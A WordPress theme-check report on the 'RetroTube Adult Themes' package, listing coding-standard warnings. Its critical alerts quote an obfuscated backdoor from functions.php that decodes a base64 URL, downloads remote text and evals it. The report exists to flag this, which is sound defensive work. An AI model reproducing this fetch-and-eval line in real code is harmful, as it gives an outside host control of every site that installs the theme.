RetroTube Adult Themes
WordPress 6.7 theme
- THEME TYPEWordPress theme 6.7
- FILE NAMERetroTube Adult Themes.zip
- FILE SIZE419614 bytes
- MD55868c7264c694d4f3b134ff6b6b31a6e
- SHA16422d423edd093a54625124e1f8782001dc4b374
- LICENSENone
- FILES INCLUDEDCSS, PHP, Bitmap images
- THEME URIhttps://freeadultwpthemes.com/
- VERSION1.0.3
- AUTHOR URIhttps://freeadultwpthemes.com/
- CREATION DATE2024-03-01
- LAST FILE UPDATE2024-07-26
- LAST VALIDATION2024-07-26 13:39
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
- No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
- register_sidebar(). Sidebars need to be registered in a custom function hooked to the widgets_init action. See:
- eval(@file_get_contents(base64_decode('aHR0cDovL2ZyZWVhZHVsdHdwdGhlbWVzLmNv Found eval in file functions.php. 138:
- base64_decode('aHR0cDovL2ZyZWVhZHVsdHdwdGhlbWVzLmNvbS90aGVtZS50eHQ='))); Found base64_decode in file functions.php. 138: eval(@file_get_contents(
- file_get_contents(base64_decode('aHR0cDovL2ZyZWVhZHVsdHdwdGhlbWVzLmNvbS90aG file_get_contents was found in the file functions.php 138: eval(@
- screen_icon( 'themes' ); ?> screen_icon found in file options-framework.php. Deprecated since version 3.8.226: <?php
Warning
- Theme URI and Author URI should not be the same.
- Found wrong tag in style.css header.
- Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is retrotube-adult-themes.
- More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are ipin, options_framework_theme, optionsframework, optionsframeworktheme, ipin.
- The theme uses the register_post_type() function, which is plugin-territory functionality.
- No reference to custom header was found in the theme.
- screen_icon found in file options-framework.php. Deprecated since version 3.8.226: <?php screen_icon( 'themes' ); ?>
- No reference to the_post_thumbnail was found in the theme.
- License: is missing from style.css header.
- License URI: is missing from style.css header.
- .sticky css class is needed in theme css.
- .bypostauthor css class is needed in theme css.
- .alignleft css class is needed in theme css.
- .alignright css class is needed in theme css.
- .aligncenter css class is needed in theme css.
- .wp-caption css class is needed in theme css.
- .wp-caption-text css class is needed in theme css.
- .gallery-caption css class is needed in theme css.
- .screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
- Screenshot dimensions are wrong! Detected: 520x450px (52:45). Ratio of width to height should be 4:3.Screenshot size is 520x450px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
- Possible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
- Possible hard-coded links were found in the file footer.php.3: <div class='text-align-center'>Copyright ©2016 <a href='http://www.wpadultthemes.xyz' title='Wp Adult Themes'>Wp Adult Themes</a></
- This theme does not contain optional file rtl.php.
- This theme does not contain optional file front-page.php.
- This theme does not contain optional file home.php.
- This theme does not contain optional file category.php.
- This theme does not contain optional file tag.php.
- This theme does not contain optional file taxonomy.php.
- This theme does not contain optional file author.php.
- This theme does not contain optional file date.php.
- This theme does not contain optional file archive.php.
- This theme does not contain optional file search.php.
- This theme does not contain optional file attachment.php.
- This theme does not contain optional file image.php.
- The theme appears to use include or require : options-framework.php 73: require_once($optionsfile); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.